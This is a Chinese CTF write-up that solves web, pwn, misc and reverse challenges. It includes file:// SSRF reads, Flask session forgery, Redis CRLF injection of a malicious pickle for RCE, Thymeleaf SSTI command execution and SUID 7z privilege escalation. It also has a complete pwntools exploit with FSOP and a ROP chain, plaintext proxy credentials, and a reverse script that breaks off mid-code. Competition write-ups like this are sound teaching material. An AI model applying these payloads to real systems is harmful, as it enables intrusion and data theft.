两个人ak了。
不过…我讨厌国内安全比赛。
web
auth
注册一个用户之后修改头像,avatar_url 支持 file:// 协议,可以任意文件读取,但是没权限读取 /flag,结果经过 base64 后放在头像框内
先读 /app/app.py
avatar_url=file:///app/app.py
发现存在 redis,尝试读 redis 持久化文件 dump.rdb
avatar_url=file:///var/lib/redis/dump.rdb
拿到 Flask secret_key
伪造 admin 的 session cookie 登录
/admin/online-users 会遍历 online_user:* 并反序列化。
虽然用了 RestrictedUnpickler,但放行了 builtins.getattr,而 OnlineUser 在白名单内
可构造 pickle 链:
getattr(getattr(getattr(getattr(OnlineUser, "__init__"),"__globals__")"get")("os"),"system")(cmd) 由于目标是:online_user:<user>
需要把该键覆盖成恶意 pickle
利用点仍是 avatar_url:将请求打到 127.0.0.1:6379,通过 CRLF + RESP 进行协议注入,发送:
AUTH redispass123
SET online_user:<user> <pickle_payload>
EXPIRE online_user:<user> 3600 通过读取 file:///proc/1/task/1/children,拿到子进程 PID:11 14 20
逐个读 file:///proc/<pid>/cmdline
在 pid=11 看到可疑启动命令:
python3 /opt/mcp_service/mcp_server_secure_e938a2d234b7968a885bbbbb63cde7b9.py 直接读这个脚本文件,发现里面存在:
SimpleXMLRPCServer(("0.0.0.0", 54321), ...) 暴露方法 execute_command,同时硬编码 token 为 mcp_secure_token_b2rglxd
在容器内执行 xmlrpc.client.ServerProxy("http://127.0.0.1:54321/") 可以调用
所以反序列化命令可以直接写成:
python3 -c "import xmlrpc.client;print(xmlrpc.client.ServerProxy('http://127.0.0.1:54321/').execute_command('mcp_secure_token_b2rglxd','cat /flag'))" >/tmp/mcp_out.txt 最后用任读从 /tmp/mcp_out.txt 中拿到flag
thymeleaf
- PRNG 状态泄露
用户注册时会从后端返回一个 PRNG 取值,可以从中获得其内部状态,然后反推回 admin 账号的密码
MASK = (1 << 48) - 1
LOW47 = (1 << 47) - 1
def prev_candidates(cur):
base = ((cur & LOW47) << 1) & MASK
return [base, base | 1] 2. Thymeleaf SSTI
控制器中存在
return "admin :: " + section; 当 Thymeleaf 看到 :: 时,会把它当作 fragment expression 去解析,故此处存在 SSTI 漏洞
在高版本 Thymeleaf 里,直接写 ${...} 通常会被拦,但通过预处理和字面量拼接可以绕过:
__|$${...}|__::.x 在通过 SSTI 进行 RCE 的过程中,由于不同 JDK 版本的 Runtime.exec 的多个重载顺序可能不同,需要爆破之后找出可用的重载下标
rt = "''.getClass().forName('java.lang.Runtime').getMethods.?[name=='getRuntime'][0].invoke(null)"
expr = f"{rt}.getClass.getMethods.?[name=='exec'][{idx}].invoke({rt},'/usr/bin/id')" RCE 之后进去的用户是 ctf,需要 root 用户才能读取 /flag
3. 7z提权
find suid:
find / -perm -4000 -type f 发现最主要的 7z,最后使用 /usr/bin/7z a -ttar -an -so /flag 直接获得 flag 内容
pwn
MailSystem
- 注册13个用户可以把admin指针给覆盖掉从而可以登录
- 下界没有考虑导致可以从mail_user_to_user leak到libc,从而覆盖stdout。
- 然后栈迁移 -> rop。
from pwn import *
import os, shutil, tempfile
import socket
context.arch = 'amd64'
context.os = 'linux'
context.log_level = 'info'
EXE = './pwn'
LIBC = './libc.so.6'
LD = './ld-linux-x86-64.so.2'
elf = context.binary = ELF(EXE, checksec=False)
libc = ELF(LIBC, checksec=False)
stdout_offset = -7
host = '192.0.100.2'
port = 9999
socks5 = '3.dart.ccsssc.com:26177'
socks_user = '3hm3n1br'
socks_pass = 'tbkzq6tp'
def _normalize_socks5(value: str) -> str:
if not value:
return ''
value = str(value).strip()
if value.lower() in {'0', 'false', 'off', 'no', 'none'}:
return ''
return value
def _normalize_opt(value: str) -> str:
if value is None:
return ''
value = str(value).strip()
if value.lower() in {'0', 'false', 'off', 'no', 'none'}:
return ''
return value
def _enable_socks5(proxy_spec: str, username: str = '', password: str = ''):
proxy_spec = _normalize_socks5(proxy_spec)
if not proxy_spec:
return
host, sep, port = proxy_spec.rpartition(':')
if not sep or not host or not port.isdigit():
raise ValueError(f'Invalid SOCKS5 proxy: {proxy_spec!r}, expected host:port')
import socks
username = _normalize_opt(username)
password = _normalize_opt(password)
socks.set_default_proxy(
socks.SOCKS5,
host,
int(port),
username=username or None,
password=password or None,
)
socket.socket = socks.socksocket
auth_state = 'enabled' if username or password else 'disabled'
info(f'Using SOCKS5 proxy: {host}:{port} (auth={auth_state})')
def _prepare_loader(path: str) -> str:
if os.access(path, os.X_OK):
return path
dst = os.path.join(tempfile.gettempdir(), 'ld.mail_system')
if not os.path.exists(dst):
shutil.copy2(path, dst)
os.chmod(dst, 0o755)
return dst
def start():
if args.REMOTE:
_enable_socks5(socks5, socks_user, socks_pass)
io = remote(host, port)
else:
ld = _prepare_loader(LD)
io = process([ld, '--library-path', '.', EXE], stdin=PIPE, stdout=PIPE)
io.recvuntil(b'Your choice: ')
return io
def register(io, name: bytes, password: bytes):
io.sendline(b'2')
io.recvuntil(b'Input your name: ')
io.sendline(name)
io.recvuntil(b'Input your password: ')
io.sendline(password)
return io.recvuntil(b'Your choice: ')
def login_user(io, name: bytes, password: bytes):
io.sendline(b'1')
io.recvuntil(b'Input your name: ')
io.sendline(name)
io.recvuntil(b'Input your password: ')
io.sendline(password)
return io.recvuntil(b'Your choice: ')
def login_admin(io):
io.sendline(b'1')
io.recvuntil(b'Input your name: ')
io.send(b'\x00\n')
io.recvuntil(b'Input your password: ')
io.send(b'\x00\n')
return io.recvuntil(b'Your choice: ')
def write_mail(io, data: bytes):
assert 1 <= len(data) <= 0x100
io.sendline(b'1')
io.recvuntil(b'How many bytes do you want to write? (1-256): ')
io.sendline(str(len(data)).encode())
io.recvuntil(b'bytes):\n')
io.send(data)
return io.recvuntil(b'Your choice: ')
def send_mail(io, dst: int, overwrite: bool = True):
io.sendline(b'3')
io.recvuntil(b'Who do you want to send the mail to? (input user ID 1-12)\n')
io.sendline(str(dst).encode())
out = io.recvuntil([b'Overwrite? (y/n): ', b'Your choice: '])
if out.endswith(b'Overwrite? (y/n): '):
io.sendline(b'y' if overwrite else b'n')
out += io.recvuntil(b'Your choice: ')
return out
def logout_user(io):
io.sendline(b'4')
return io.recvuntil(b'Your choice: ')
def admin_logout(io):
io.sendline(b'5')
return io.recvuntil(b'Your choice: ')
def admin_forward(io, src: int, dst: int, which: int, overwrite: bool = True, final_mode: str = 'prompt'):
io.sendline(b'4')
io.recvuntil(b'Enter source user ID (whose mail to forward): (1-12) ')
io.sendline(str(src).encode())
io.recvuntil(b'Enter destination user ID (1-12): ')
io.sendline(str(dst).encode())
out = io.recvuntil([b'Overwrite? (y/n): ', b'Which mail would you like to forward?\n', b'Your choice: '])
if out.endswith(b'Overwrite? (y/n): '):
io.sendline(b'y' if overwrite else b'n')
out += io.recvuntil([b'Which mail would you like to forward?\n', b'Your choice: '])
if b'Which mail would you like to forward?' not in out:
return out
io.recvuntil(b'Your choice: ')
io.sendline(str(which).encode())
if final_mode == 'prompt':
out += io.recvuntil(b'Your choice: ')
else:
out += io.recvrepeat(0.5)
return out
def ban_user(io, name: bytes, password: bytes, victim_id: int = 8):
out = login_user(io, name, password)
if b'Welcome back' not in out:
raise RuntimeError(f'login failed for {name!r}: {out!r}')
# 1. Write mail
# 1 byte
# content = 'A'
# 3. Send mail
# victim_id
# overwrite = y
one = b'1\n1\nA3\n' + str(victim_id).encode() + b'\ny\n'
total = 0
while True:
io.send(one * 6)
total += 6
out = io.recvuntil(b'Your choice: ', timeout=5)
out += io.recvrepeat(0.2)
if b'Account has been banned!' in out:
success(f'{name!r} banned after {total} sends')
return out
if b'Welcome back' in out and b'1. Write mail' not in out:
raise RuntimeError(f'{name!r} state changed unexpectedly: {out!r}')
info(f'{name!r} not banned yet, sent={total}')
def takeover_admin(io):
for i in range(1, 9):
register(io, f'u{i}'.encode(), f'p{i}'.encode())
for i in range(1, 6):
ban_user(io, f'u{i}'.encode(), f'p{i}'.encode())
for i in range(9, 13):
register(io, f'u{i}'.encode(), f'p{i}'.encode())
register(io, b'u13', b'p13')
out = login_admin(io)
assert b'Welcome admin!' in out
def leak_libc(io, src_uid: int = 8):
payload = flat(0xfbad1800, 0, 0, 0) + p16(0xb780)
admin_logout(io)
login_user(io, f'u{src_uid}'.encode(), f'p{src_uid}'.encode())
write_mail(io, payload)
logout_user(io)
login_admin(io)
data = admin_forward(io, src_uid, stdout_offset, 1, final_mode='repeat')
marker = b'Which mail would you like to forward?\n'
leak = data.split(marker, 1)[1].split(b'Mail forwarded', 1)[0]
stdout = u64(leak[0x20:0x28])
libc_base = stdout - libc.sym['_IO_2_1_stdout_']
success(f'libc_base = {hex(libc_base)}')
success(f'stdout = {hex(stdout)}')
return libc_base, stdout
def build_stdout_payload(libc_base: int, stdout: int):
stderr = libc_base + libc.sym['_IO_2_1_stderr_']
stdin = libc_base + libc.sym['_IO_2_1_stdin_']
stage2_addr = libc_base + 0x21d000
wide_data = stdout - 0x50
setcontext_3d = libc_base + libc.sym['setcontext'] + 0x3d
read_addr = libc_base + libc.sym['read']
file_jumps = libc_base + 0x217600
wfile_jumps = libc_base + 0x2170c0
lock_ptr = libc_base + 0x21ca70
d = bytearray(0x100)
def wq(off: int, val: int):
d[off:off + 8] = p64(val)
def wd(off: int, val: int):
d[off:off + 4] = p32(val & 0xffffffff)
# known-good stdout template for this libc
wq(0x00, 0xfbad2887)
for off in [0x08, 0x10, 0x18, 0x20, 0x28, 0x30, 0x38]:
wq(off, stdout + 0x83)
wq(0x40, stdout + 0x84)
wq(0x48, 0)
wq(0x50, 0)
wq(0x58, 0)
wq(0x60, 0)
wq(0x68, stdin)
wq(0x70, 1)
wq(0x78, 0xffffffffffffffff)
wq(0x80, 0x0a000000)
wq(0x88, lock_ptr)
wq(0x90, 0xffffffffffffffff)
wq(0x98, 0)
wq(0xa0, libc_base + 0x21a9a0)
wq(0xa8, 0)
wq(0xb0, 0)
wq(0xb8, 0)
wd(0xc0, 0xffffffff)
wq(0xc8, 0)
wq(0xd0, 0)
wq(0xd8, file_jumps)
wq(0xe0, stderr)
wq(0xe8, stdout)
wq(0xf0, stdin)
wq(0xf8, 0)
# exploit patch:
# _IO_wfile_overflow -> _IO_wdoallocbuf -> call [wide_vtable+0x68]
# with wide_data = stdout-0x50 and wide_vtable = stdout.
wq(0x00, 0xfbad2085) # clear _IO_NO_WRITES and clear the 0x800 bit
wq(0x18, 0) # wide+0x68 -> rdi = 0
wq(0x20, stage2_addr) # wide+0x70 -> rsi = stage2 buffer
wq(0x38, 0x400) # wide+0x88 -> rdx = count
wq(0x48, 0) # wide+0x98 -> rcx
wq(0x50, stage2_addr) # wide+0xa0 -> rsp = stage2 buffer
wq(0x58, read_addr) # wide+0xa8 -> return to read
wq(0x68, setcontext_3d) # stdout[0x68] == fake_wide_vtable[0x68]
wq(0x90, stdout) # wide+0xe0 -> fake wide_vtable = stdout
wq(0xa0, wide_data) # _wide_data = stdout-0x50
wd(0xc0, 1) # _mode > 0
wq(0xd8, wfile_jumps) # use _IO_wfile_jumps
return bytes(d), stage2_addr
io = start()
takeover_admin(io)
success("stage1 done: fake admin acquired")
libc_base, stdout = leak_libc(io)
stdout_payload, stage2_addr = build_stdout_payload(libc_base, stdout)
rop = ROP(libc)
pop_rdi = rop.find_gadget(["pop rdi", "ret"]).address + libc_base
pop_rsi = rop.find_gadget(["pop rsi", "ret"]).address + libc_base
pop_rdx_r12 = (
next(
addr
for addr, g in rop.gadgets.items()
if g.insns == ["pop rdx", "pop r12", "ret"]
)
+ libc_base
)
open_addr = libc_base + libc.sym["open"]
read_addr = libc_base + libc.sym["read"]
write_addr = libc_base + libc.sym["write"]
flag_addr = stage2_addr + 0x180
buf_addr = stage2_addr + 0x200
stage2 = flat(
pop_rdi,
flag_addr,
pop_rsi,
0,
pop_rdx_r12,
0,
0,
open_addr,
pop_rdi,
3,
pop_rsi,
buf_addr,
pop_rdx_r12,
0x100,
0,
read_addr,
pop_rdi,
1,
pop_rsi,
buf_addr,
pop_rdx_r12,
0x100,
0,
write_addr,
)
stage2 = stage2.ljust(0x180, b"\x00") + b"/flag\x00"
stage2 = stage2.ljust(0x400, b"\x00")
admin_logout(io)
login_user(io, b"u10", b"p10")
write_mail(io, stdout_payload)
logout_user(io)
login_admin(io)
admin_forward(io, 10, stdout_offset, 1, final_mode="repeat")
io.send(b"5\n")
sleep(0.1)
io.send(stage2)
data = io.recvrepeat(2.0)
print(data)
io.interactive() misc
steg
xxd看一眼
直接删掉前面的东西,libmagic能正常识别了。
但是打不开,图片IDAT CRC爆炸了。把idat拼起来之后错位。
写一个策略尽可能多恢复点东西:
import zlib
from pathlib import Path
from typing import Iterable
from PIL import Image
PNG_SIG = b'\x89PNG\r\n\x1a\n'
def iter_png_chunks(png: bytes):
if not png.startswith(PNG_SIG):
raise ValueError('Not a PNG stream')
off = len(PNG_SIG)
while off + 12 <= len(png):
length = int.from_bytes(png[off:off + 4], 'big')
ctype = png[off + 4:off + 8]
data_start = off + 8
data_end = data_start + length
crc_end = data_end + 4
if crc_end > len(png):
break
yield ctype, png[data_start:data_end], off, crc_end
off = crc_end
if ctype == b'IEND':
break
def get_png_info(png: bytes):
for ctype, data, _start, _end in iter_png_chunks(png):
if ctype == b'IHDR':
if len(data) != 13:
raise ValueError('Bad IHDR length')
width = int.from_bytes(data[0:4], 'big')
height = int.from_bytes(data[4:8], 'big')
bit_depth = data[8]
color_type = data[9]
compression = data[10]
filter_method = data[11]
interlace = data[12]
return {
'width': width,
'height': height,
'bit_depth': bit_depth,
'color_type': color_type,
'compression': compression,
'filter_method': filter_method,
'interlace': interlace,
'channels': {0: 1, 2: 3, 3: 1, 4: 2, 6: 4}.get(color_type, 0)
}
raise ValueError('IHDR not found')
def paeth_predictor(a: int, b: int, c: int):
p = a + b - c
pa = abs(p - a)
pb = abs(p - b)
pc = abs(p - c)
if pa <= pb and pa <= pc:
return a
if pb <= pc:
return b
return c
def reconstruct_scanline(filter_type: int, filtered: bytes, prior: bytes, channels: int = 3):
stride = len(filtered)
recon = bytearray(stride)
if filter_type == 0: # None
recon[:] = filtered
elif filter_type == 1: # Sub
for x in range(stride):
a = recon[x - channels] if x >= channels else 0
recon[x] = (filtered[x] + a) & 0xff
elif filter_type == 2: # Up
for x in range(stride):
recon[x] = (filtered[x] + prior[x]) & 0xff
elif filter_type == 3: # Average
for x in range(stride):
a = recon[x - channels] if x >= channels else 0
b = prior[x]
recon[x] = (filtered[x] + ((a + b) // 2)) & 0xff
elif filter_type == 4: # Paeth
for x in range(stride):
a = recon[x - channels] if x >= channels else 0
b = prior[x]
c = prior[x - channels] if x >= channels else 0
recon[x] = (filtered[x] + paeth_predictor(a, b, c)) & 0xff
else:
raise ValueError(f'Invalid filter type: {filter_type}')
return bytes(recon)
# Main program
input_file = Path('carved.png')
output_file = Path('carved_repaired.png')
# Read PNG
png_data = input_file.read_bytes()
# Parse PNG info
info = get_png_info(png_data)
width = info['width']
height = info['height']
num_channels = info['channels']
# Extract and concatenate all IDAT chunks
idat_data = bytearray()
idx = 0
while True:
i = png_data.find(b'IDAT', idx)
if i < 0:
break
if i >= 4:
length = int.from_bytes(png_data[i - 4:i], 'big')
data_start = i + 4
data_end = data_start + length
if data_end <= len(png_data):
idat_data.extend(png_data[data_start:data_end])
idx = i + 1
idat_data = bytes(idat_data)
raw = zlib.decompressobj().decompress(idat_data)
row_len = 1 + num_channels * width
expected = row_len * height
max_delta = len(raw) - expected
# dp
neg = -10 ** 9
prev = [neg] * (max_delta + 1)
prev[0] = 1 if raw[0] <= 4 else 0
parents = []
for r in range(1, height):
cur = [neg] * (max_delta + 1)
par = [-1] * (max_delta + 1)
for d in range(max_delta + 1):
best = neg
best_pd = -1
lo = max(0, d - 12)
for pd in range(lo, d + 1):
if prev[pd] > best:
best = prev[pd]
best_pd = pd
if best_pd >= 0:
idx_offset = d + r * row_len
if idx_offset < len(raw):
cur[d] = best + (1 if raw[idx_offset] <= 4 else 0)
par[d] = best_pd
parents.append(par)
prev = cur
def endpoint_score(d):
base_score = prev[d]
penalty = abs(d - max_delta) * 0.2
return base_score - penalty
end_delta = max(range(max_delta + 1), key=endpoint_score)
path = [end_delta]
for r in range(height - 1, 0, -1):
end_delta = parents[r - 1][end_delta]
path.append(end_delta)
path.reverse()
stride = num_channels * width
rows = []
prior = bytearray(stride)
for r, d in enumerate(path):
start = d + r * row_len
filter_type = raw[start]
filtered = raw[start + 1:start + 1 + stride]
try:
recon = reconstruct_scanline(filter_type, filtered, prior, num_channels)
rows.append(recon)
prior = recon
except ValueError:
recon = bytes(stride)
rows.append(recon)
prior = bytearray(stride)
img_data = b''.join(rows)
img = Image.frombytes('RGB', (width, height), img_data)
img.save(output_file) 拿出来是这样一张。
低位lsb,RGB拼接。能看到zip包。
这里小文件可以用crc32爆破了。
于是恢复出来
pass
is
c1!x
xtLf
%fXY
PkaA 解压flag.txt,0宽字符。。。。01编码,复原。
zw = ''.join(ch for ch in text if ch in '\u200b\u200c')
if not zw:
raise ValueError('no zero-width data found')
bits = ''.join('0' if ch == '\u200b' else '1' for ch in zw)
usable = len(bits) // 8 * 8
raw = bytes(int(bits[i:i + 8], 2) for i in range(0, usable, 8))
try:
return raw.decode('utf-8')
except UnicodeDecodeError:
return raw.decode('latin1') reverse
re1
这里拼了个pyc,拿下来pylingual还原。
# Decompiled with PyLingual (https://pylingual.io)
# Internal filename: 'Payload_To_PixelCode_video.py'
# Bytecode version: 3.7.0 (3394)
# Source timestamp: 2026-01-04 04:02:18 UTC (1767499338)
from PIL import Image
import math
import os
import sys
import numpy as np
import imageio
from tqdm import tqdm
def file_to_video(input_file, width=640, height=480, pixel_size=8, fps=10, output_file='video.mp4'):
if not os.path.isfile(input_file):
return None
file_size = os.path.getsize(input_file)
binary_string = ''
with open(input_file, 'rb') as f:
for chunk in tqdm(iterable=iter(lambda: f.read(1024), b''), total=math.ceil(file_size / 1024), unit='KB', desc='读取文件'):
binary_string += ''.join((f'{byte:08b}' for byte in chunk))
xor_key = '10101010'
xor_binary_string = ''
for i in range(0, len(binary_string), 8):
chunk = binary_string[i:i + 8]
if len(chunk) == 8:
chunk_int = int(chunk, 2)
key_int = int(xor_key, 2)
xor_result = chunk_int ^ key_int
xor_binary_string += f'{xor_result:08b}'
else:
xor_binary_string += chunk
binary_string = xor_binary_string
pixels_per_image = width // pixel_size * (height // pixel_size)
num_images = math.ceil(len(binary_string) / pixels_per_image)
frames = []
for i in tqdm(range(num_images), desc='生成视频帧'):
start = i * pixels_per_image
bits = binary_string[start:start + pixels_per_image]
if len(bits) < pixels_per_image:
bits = bits + '0' * (pixels_per_image - len(bits))
img = Image.new('RGB', (width, height), color='white')
for r in range(height // pixel_size):
row_start = r * (width // pixel_size)
row_end = (r + 1) * (width // pixel_size)
row = bits[row_start:row_end]
for c, bit in enumerate(row):
color = (0, 0, 0) if bit == '1' else (255, 255, 255)
x1, y1 = (c * pixel_size, r * pixel_size)
img.paste(color, (x1, y1, x1 + pixel_size, y1 + pixel_size))
frames.append(np.array(img))
with imageio.get_writer(output_file, fps=fps, codec='libx264') as writer:
for frame in tqdm(frames, desc='写入视频帧'):
writer.append_data(frame)
if __name__ == '__main__':
input_path = 'payload'
if os.path.exists(input_path):
file_to_video(input_path)
else:
sys.exit(1) 简单还原下。
from PIL import Image
import cv2
import math
import numpy as np
from tqdm import tqdm
cap = cv2.VideoCapture("video.mp4")
bits = ""
width=640
height=480
pixel_size=8
fps=10
total_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
for _ in tqdm(range(total_frames)):
ret, frame = cap.read()
if not ret:
break
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
for r in range(height // pixel_size):
for c in range(width // pixel_size):
x = c * pixel_size
y = r * pixel_size
pixel = frame[y + pixel_size // 2, x + pixel_size // 2]
if np.mean(pixel) < 128:
bits += "1"
else:
bits += "0"
cap.release()
xor_key = "10101010"
recovered_bits = ""
for i in range(0, len(bits), 8):
chunk = bits[i : i + 8]
if len(chunk) == 8:
val = int(chunk, 2) ^ int(xor_key, 2)
recovered_bits += f"{val:08b}"
data = bytearray()
for i in range(0, len(recovered_bits), 8):
byte = recovered_bits[i : i + 8]
if len(byte) == 8:
data.append(int(byte, 2))
open("1", "wb").write(data) import hashlib
strs = """8277e0910d750195b448797616e091ad
0cc175b9c0f1b6a831c399e269772661
4b43b0aee35624cd95b910189b3dc231
e358efa489f58062f10dd7316b65649e
f95b70fdc3088560732a5ac135644506
c81e728d9d4c2f636f067f89cc14862c
92eb5ffee6ae2fec3ad71c777531578f
c4ca4238a0b923820dcc509a6f75849b
8fa14cdd754f91cc6554c9e71929cce7
c9f0f895fb98ab9159f51fd0297e236d
336d5ebc5436534e61d16e63ddfca327
eccbc87e4b5ce2fe28308fd9f2a7baf3
cfcd208495d565ef66e7dff9f98764da
a87ff679a2f3e71d9181a67b7542122c
e4da3b7fbbce2345d7772b0674a318d5
e1671797c52e15f763380b45e841ec32
8f14e45fceea167a5a36dedd4bea2543
1679091c5a880faf6fb5e6087eb1b2dc
4a8a08f09d37b73795649038408b5f33
cbb184dd8e05c9709e5dcaedaa0495cf""".splitlines()
maps = {}
for i in range(0,255):
r = hashlib.md5(chr(i).encode()).hexdigest()
maps[r] = chr(i)
for s in strs:
print(maps[s], end="") re2
类似upx的壳。解压完了走这个地方0x4014E0跳出。
没带windows只能unicorn跑了。需要模拟几个系统函数。
api_stubs = {
"LoadLibraryA": api_base + 0x100,
"ExitProcess": api_base + 0x200,
"GetProcAddress": api_base + 0x300,
"VirtualProtect": api_base + 0x400,
"exit": api_base + 0x500,
} 能取出来一个base64。解码是下一个stage。
import base64
import struct
import os
import pefile
from unicorn import Uc
from unicorn.x86_const import *
from unicorn.unicorn_const import *
os.makedirs("out", exist_ok=True)
packed_pe = pefile.PE("challenge.exe")
packed_image = open("challenge.exe", "rb").read()
packed_base = packed_pe.OPTIONAL_HEADER.ImageBase
packed_size = (packed_pe.OPTIONAL_HEADER.SizeOfImage + 0xFFF) & ~0xFFF
mu = Uc(UC_ARCH_X86, UC_MODE_64)
mu.mem_map(packed_base, packed_size)
mu.mem_write(packed_base, packed_image[: packed_pe.OPTIONAL_HEADER.SizeOfHeaders])
for packed_section in packed_pe.sections:
packed_raw = packed_image[
packed_section.PointerToRawData : packed_section.PointerToRawData + packed_section.SizeOfRawData
]
if packed_raw:
mu.mem_write(packed_base + packed_section.VirtualAddress, packed_raw)
stack_base = 0x01000000
stack_size = 0x00200000
mu.mem_map(stack_base, stack_size)
mu.reg_write(UC_X86_REG_RSP, stack_base + stack_size - 0x10000)
api_base = 0x03000000
mu.mem_map(api_base, 0x00020000)
api_stubs = {
"LoadLibraryA": api_base + 0x100,
"ExitProcess": api_base + 0x200,
"GetProcAddress": api_base + 0x300,
"VirtualProtect": api_base + 0x400,
"exit": api_base + 0x500,
}
for api_stub in api_stubs.values():
mu.mem_write(api_stub, b"\xC3")
for import_entry in packed_pe.DIRECTORY_ENTRY_IMPORT:
for import_symbol in import_entry.imports:
if not import_symbol.name:
continue
import_name = import_symbol.name.decode()
if import_name in api_stubs:
mu.mem_write(import_symbol.address, struct.pack("<Q", api_stubs[import_name]))
state = {"stop": False, "next_fake": api_base + 0x1000}
dll_handles: dict[str, int] = {}
symbol_addrs: dict[tuple[int, str], int] = {}
addr_to_name: dict[int, str] = {}
def on_code(mu: Uc, address: int, _size: int, user_data: dict) -> None:
if address == 0x4014E0:
print("reached 0x4014E0", stop)
user_data["stop"] = True
mu.emu_stop()
return
if address == api_stubs["LoadLibraryA"]:
print(f"called LoadLibraryA")
rcx = mu.reg_read(UC_X86_REG_RCX)
dll_name_bytes = bytearray()
while True:
current = mu.mem_read(rcx, 1)[0]
if current == 0:
break
dll_name_bytes.append(current)
rcx += 1
dll_name = dll_name_bytes.decode("latin1")
handle = dll_handles.setdefault(dll_name, api_base + 0x8000 + len(dll_handles) * 0x100)
rsp = mu.reg_read(UC_X86_REG_RSP)
ret_addr = struct.unpack("<Q", mu.mem_read(rsp, 8))[0]
mu.reg_write(UC_X86_REG_RSP, rsp + 8)
mu.reg_write(UC_X86_REG_RAX, handle)
mu.reg_write(UC_X86_REG_RIP, ret_addr)
return
if address == api_stubs["GetProcAddress"]:
print(f"called GetProcAddress")
handle = mu.reg_read(UC_X86_REG_RCX)
rdx = mu.reg_read(UC_X86_REG_RDX)
symbol_name_bytes = bytearray()
while True:
current = mu.mem_read(rdx, 1)[0]
if current == 0:
break
symbol_name_bytes.append(current)
rdx += 1
symbol_name = symbol_name_bytes.decode("latin1")
symbol_key = (handle, symbol_name)
if symbol_key not in symbol_addrs:
fake_addr = user_data["next_fake"]
user_data["next_fake"] += 0x10
symbol_addrs[symbol_key] = fake_addr
addr_to_name[fake_addr] = symbol_name
mu.mem_write(fake_addr, b"\xC3" * 8)
rsp = mu.reg_read(UC_X86_REG_RSP)
ret_addr = struct.unpack("<Q", mu.mem_read(rsp, 8))[0]
mu.reg_write(UC_X86_REG_RSP, rsp + 8)
mu.reg_write(UC_X86_REG_RAX, symbol_addrs[symbol_key])
mu.reg_write(UC_X86_REG_RIP, ret_addr)
return
if address == api_stubs["VirtualProtect"]:
print(f"called VirtualProtect")
old_protect_ptr = mu.reg_read(UC_X86_REG_R9)
if old_protect_ptr:
mu.mem_write(old_protect_ptr, struct.pack("<I", 0x20))
rsp = mu.reg_read(UC_X86_REG_RSP)
ret_addr = struct.unpack("<Q", mu.mem_read(rsp, 8))[0]
mu.reg_write(UC_X86_REG_RSP, rsp + 8)
mu.reg_write(UC_X86_REG_RAX, 1)
mu.reg_write(UC_X86_REG_RIP, ret_addr)
return
if address in (api_stubs["ExitProcess"], api_stubs["exit"]):
print(f"called ExitProcess")
user_data["stop"] = True
mu.emu_stop()
return
if address not in addr_to_name:
return
fake_name = addr_to_name[address]
fake_result = 0
if fake_name == "GetCurrentProcess":
fake_result = 114514
elif fake_name in {"GetCurrentProcessId", "GetCurrentThreadId", "GetTickCount"}:
fake_result = 1
elif fake_name == "QueryPerformanceCounter":
out_ptr = mu.reg_read(UC_X86_REG_RCX)
mu.mem_write(out_ptr, struct.pack("<Q", 1))
fake_result = 1
elif fake_name == "GetSystemTimeAsFileTime":
out_ptr = mu.reg_read(UC_X86_REG_RCX)
mu.mem_write(out_ptr, struct.pack("<Q", 0))
elif fake_name == "GetStartupInfoA":
out_ptr = mu.reg_read(UC_X86_REG_RCX)
mu.mem_write(out_ptr, b"\x00" * 0x68)
elif fake_name == "GetModuleHandleA":
fake_result = packed_base
elif fake_name in {
"VirtualQuery",
"RtlAddFunctionTable",
"InitializeCriticalSection",
"DeleteCriticalSection",
"EnterCriticalSection",
"LeaveCriticalSection",
"SetUnhandledExceptionFilter",
}:
fake_result = 1
rsp = mu.reg_read(UC_X86_REG_RSP)
ret_addr = struct.unpack("<Q", mu.mem_read(rsp, 8))[0]
mu.reg_write(UC_X86_REG_RSP, rsp + 8)
mu.reg_write(UC_X86_REG_RAX, fake_result)
mu.reg_write(UC_X86_REG_RIP, ret_addr)
mu.hook_add(UC_HOOK_CODE, on_code, state)
mu.emu_start(packed_base + packed_pe.OPTIONAL_HEADER.AddressOfEntryPoint, 0)
loader_dump = bytes(mu.mem_read(packed_base, 0x15000))
blob_start = loader_dump.find(b"TVqQAAMAAAAEAAAA//8A")
print(blob_start)
blob_end = blob_start
while blob_end < len(loader_dump) and loader_dump[blob_end] in "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=":
blob_end += 1
stage2_enc = base64.b64decode(loader_dump[blob_start:blob_end])
open("out/stage2.exe", "wb").write(stage2_enc) 这里做了一次解密。
进去扫一眼大概就知道rc4了。
rc4 key在0x4070C0。可以直接跑,跑完就有.rdata和.hello里的内容。
import pefile
stage2_enc = open("out/stage2.exe", "rb").read()
stage2_pe = pefile.PE(data=stage2_enc)
stage2_dec = bytearray(stage2_enc)
rc4_key_offset = stage2_pe.get_offset_from_rva(0x70C0)
rc4_key = bytes(stage2_dec[rc4_key_offset : rc4_key_offset + 0x20])
for target_name in (b".hello", b".mydata"):
target_section = next(section for section in stage2_pe.sections if section.Name.rstrip(b"\0") == target_name)
target_start = target_section.PointerToRawData
target_end = target_start + target_section.SizeOfRawData
s = list(range(256))
j = 0
for i in range(256):
j = (j + s[i] + rc4_key[i % len(rc4_key)]) & 0xFF
s[i], s[j] = s[j], s[i]
i = 0
j = 0
decrypted = bytearray(stage2_dec[target_start:target_end])
for index, value in enumerate(decrypted):
i = (i + 1) & 0xFF
j = (j + s[i]) & 0xFF
s[i], s[j] = s[j], s[i]
decrypted[index] = value ^ s[(s[i] + s[j]) & 0xFF]
stage2_dec[target_start:target_end] = decrypted
open("out/stage2_dec.exe", "wb").write(stage2_dec) 校验逻辑。0x408000 ... 0x408020,aes key,0x408021-408030,iv。0x31开始是密文。
模式是cbc。直接跑也跑不出来,应该是魔改了,但是能找到解密逻辑所以,,继续模拟执行吧。
import struct
import pefile
from unicorn import Uc
from unicorn.x86_const import *
from unicorn.unicorn_const import *
# def hook_code(mu: Uc, address: int, _size: int, user_data: dict) -> None:
# if address == 0x404d80:
# print("reached AES decrypt start")
# return
stage2_dec = open("out/stage2_dec.exe", "rb").read()
stage2_dec_pe = pefile.PE(data=stage2_dec)
stage2_base = stage2_dec_pe.OPTIONAL_HEADER.ImageBase
stage2_size = (stage2_dec_pe.OPTIONAL_HEADER.SizeOfImage + 0xFFF) & ~0xFFF
mu = Uc(UC_ARCH_X86, UC_MODE_64)
mu.mem_map(stage2_base, stage2_size)
mu.mem_write(stage2_base, stage2_dec[: stage2_dec_pe.OPTIONAL_HEADER.SizeOfHeaders])
for stage2_section in stage2_dec_pe.sections:
stage2_raw = stage2_dec[
